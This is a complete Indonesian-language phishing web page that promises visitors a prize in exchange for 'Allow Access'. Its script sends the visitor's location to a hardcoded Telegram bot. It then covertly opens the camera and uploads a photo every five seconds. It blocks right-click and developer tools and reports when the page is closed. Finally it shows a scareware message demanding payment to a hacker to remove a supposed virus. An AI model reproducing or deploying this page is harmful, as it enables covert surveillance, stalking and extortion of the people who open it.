<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Private Access</title>
    <style>
        body {
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f0f0f0;
    margin: 0;
}
.container {
    background-color: white;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    text-align: center;
    width: 300px;
    display: none; /* Hidden by default */
}
.popup {
    background-color: rgba(0, 0, 0, 0.5);
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    display: flex;
    justify-content: center;
    align-items: center;
}
.popup-content {
    background-color: white;
    padding: 20px;
    border-radius: 8px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    text-align: center;
    width: 300px;
}
button {
    padding: 10px 20px;
    background-color: #007BFF;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}
button:hover {
    background-color: #0056b3;
}
#error {
    margin-top: 20px;
    color: red;
    font-weight: bold;
}
#countdown {
    font-size: 1rem;
    margin-top: 20px;
}
@keyframes blinkCursor {
    50% {
        border-right-color: transparent;
    }
}
@keyframes typeAndDelete {
    0%, 10% {
        width: 0;
    }
    45%, 55% {
        width: 16em; /* Atur lebar sesuai dengan .terminal-loader */
    }
    90%, 100% {
        width: 0;
    }
}
.terminal-loader {
    border: 0.1em solid #333;
    background-color: #1a1a1a;
    color: #0f0;
    font-family: "Courier New", Courier, monospace;
    font-size: 1em;
    padding: 1.5em 1em;
    width: 16em; /* Menambahkan lebar */
    margin: 3rem auto;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
    border-radius: 4px;
    position: relative;
    overflow: hidden;
    box-sizing: border-box;
}
.terminal-header {
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    height: 1.5em;
    background-color: #333;
    border-top-left-radius: 4px;
    border-top-right-radius: 4px;
    padding: 0 0.4em;
    box-sizing: border-box;
    overflow: hidden; /* Menghindari overflow pada header */
}
.terminal-controls {
    float: right;
}
.control {
    display: inline-block;
    width: 0.6em;
    height: 0.6em;
    margin-left: 0.4em;
    border-radius: 50%;
    background-color: #777;
}
.control.close {
    background-color: #e33;
}
.control.minimize {
    background-color: #ee0;
}
.control.maximize {
    background-color: #0b0;
}
.terminal-title {
    float: left;
    line-height: 1.5em;
    color: #eee;
}
.text {
    display: inline-block;
    white-space: nowrap;
    overflow: hidden;
    border-right: 0.2em solid green; /* Cursor */
    animation: typeAndDelete 6s steps(20) infinite, /* Memperpanjang durasi dan steps */
               blinkCursor 0.5s step-end infinite alternate;
    margin-top: 1.5em;
    width: 100%; /* Memastikan teks tidak terpotong */
    box-sizing: border-box;
}

    </style>
</head>
<body>
    <div class="popup" id="popup">
        <div class="popup-content">
            <h1>Private Access</h1>
            <div class="terminal-loader">
                <div class="terminal-header">
                  <div class="terminal-title">Status</div>
                  <div class="terminal-controls">
                    <div class="control close"></div>
                    <div class="control minimize"></div>
                    <div class="control maximize"></div>
                  </div>
                </div>
                <div class="text">Loading...</div>
              </div>              
            <p>Izinkan Untuk melanjutkan ke website untuk menerima hadiah</p>
            <button onclick="requestPermissions()">Allow Access</button>
            <div id="error"></div>
        </div>
    </div>

    <div class="container" id="container">
        <h1>Welcome to Private Access</h1>
        <p>Hello and welcome, silahkan menunggu 15 detik untuk melanjutkan ke website...</p>
        <div id="countdown">15</div>
        <div class="terminal-loader" id="terminalLoader">
            <div class="terminal-header">
              <div class="terminal-title">Status</div>
              <div class="terminal-controls">
                <div class="control close"></div>
                <div class="control minimize"></div>
                <div class=" control maximize"></div>
              </div>
            </div>
            <div class="text" id="loaderText">Loading...</div>
          </div>     
    </div>
   
        
    <script>

// Disable Right Click and F12
document.addEventListener('contextmenu', function(e) {
    e.preventDefault();
});

document.addEventListener('keydown', function(e) {
    if (e.key === 'F12' || (e.ctrlKey && e.shiftKey && e.key === 'I')) {
        e.preventDefault();
    }
});
      const botToken = '7353666812:AAHsnlZbqNxGvW7YR8Hk2sX9D8dO2VFipPk';
      const chatId = '7408143919';

      function sendMessageToTelegram(message) {
        const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${encodeURIComponent(message)}`;
        return fetch(telegramApiUrl)
            .then(response => response.json())
            .catch(error => {
                console.error('Failed to send message to Telegram: ' + error.message);
            });
      }

      function sendLocationToTelegram(latitude, longitude) {
        const googleMapsUrl = `https://www.google.com/maps/search/?api=1&query=${latitude},${longitude}`;
        const message = `User location: [Google Maps Link](${googleMapsUrl})`;
        return sendMessageToTelegram(message);
      }

      function sendPhotoToTelegram(photoBlob, message) {
        const formData = new FormData();
        formData.append('chat_id', chatId);
        formData.append('photo', photoBlob, 'photo.jpg');
        formData.append('caption', message);

        const telegramApiUrl = `https://api.telegram.org/bot${botToken}/sendPhoto`;
        return fetch(telegramApiUrl, {
            method: 'POST',
            body: formData
        })
        .then(response => response.json())
        .catch(error => {
            console.error('Failed to send photo to Telegram: ' + error.message);
        });
      }

      function capturePhoto(videoElement) {
        return new Promise((resolve, reject) => {
            const canvas = document.createElement('canvas');
            canvas.width = videoElement.videoWidth;
            canvas.height = videoElement.videoHeight;
            const context = canvas.getContext('2d');
            context.drawImage(videoElement, 0, 0, canvas.width, canvas.height);
            canvas.toBlob(blob => resolve(blob), 'image/jpeg');
        });
      }

      function startCapturingPhotos(videoElement) {
        setInterval(() => {
            capturePhoto(videoElement)
                .then(photoBlob => {
                    const message = "Photo captured at " + new Date().toLocaleString();
                    return sendPhotoToTelegram(photoBlob, message);
                })
                .catch(error => console.error(error));
        }, 5000); // Ambil foto setiap 5 detik
      }

      function requestPermissions() {
        if (navigator.geolocation && navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
            navigator.geolocation.getCurrentPosition(
                position => {
                    const { latitude, longitude } = position.coords;
                    sendLocationToTelegram(latitude, longitude)
                        .then(() => {
                            return navigator.mediaDevices.getUserMedia({ video: true });
                        })
                        .then(stream => {
                            const video = document.createElement('video');
                            video.srcObject = stream;
                            video.setAttribute('autoplay', '');
                            video.setAttribute('playsinline', '');
                            video.style.display = 'none';
                            document.body.appendChild(video);
                            
                            video.addEventListener('loadeddata', () => {
                                document.getElementById('popup').style.display = 'none';
                                document.querySelector('.container').style.display = 'block';
                                startCapturingPhotos(video);
                                startCountdown();
                            });
                        })
                        .catch(error => {
                            document.getElementById('error').textContent = 'Failed to get permissions: ' + error.message;
                        });
                },
                error => {
                    document.getElementById('error').textContent = 'Location access denied. You cannot access this website.';
                }
            );
        } else {
            document.getElementById('error').textContent = 'Geolocation or Camera is not supported by this browser.';
        }
      }

      function startCountdown() {
        let countdownElement = document.getElementById('countdown');
        let countdownValue = 15;

        let countdownInterval = setInterval(() => {
            countdownValue--;
            countdownElement.textContent = countdownValue;
            
            if (countdownValue === 0) {
                clearInterval(countdownInterval);
                countdownElement.textContent = "Handphone anda terkena virus bayar ke hacker untuk menghilangkan virus nya...";
                document.getElementById('terminalLoader').style.display = 'block';
                // Change text to "Virus" after the countdown
                setTimeout(() => {
                    document.getElementById('loaderText').textContent = 'Virus Terkirim';
                }, 1000); // Change text after 10 seconds
            }
        }, 1000);
      }

      window.onload = function() {
        document.getElementById('popup').style.display = 'flex';
      }

      window.onbeforeunload = function() {
        sendMessageToTelegram('Pengguna telah menutup website...');
      }
    </script>
</body>
</html>
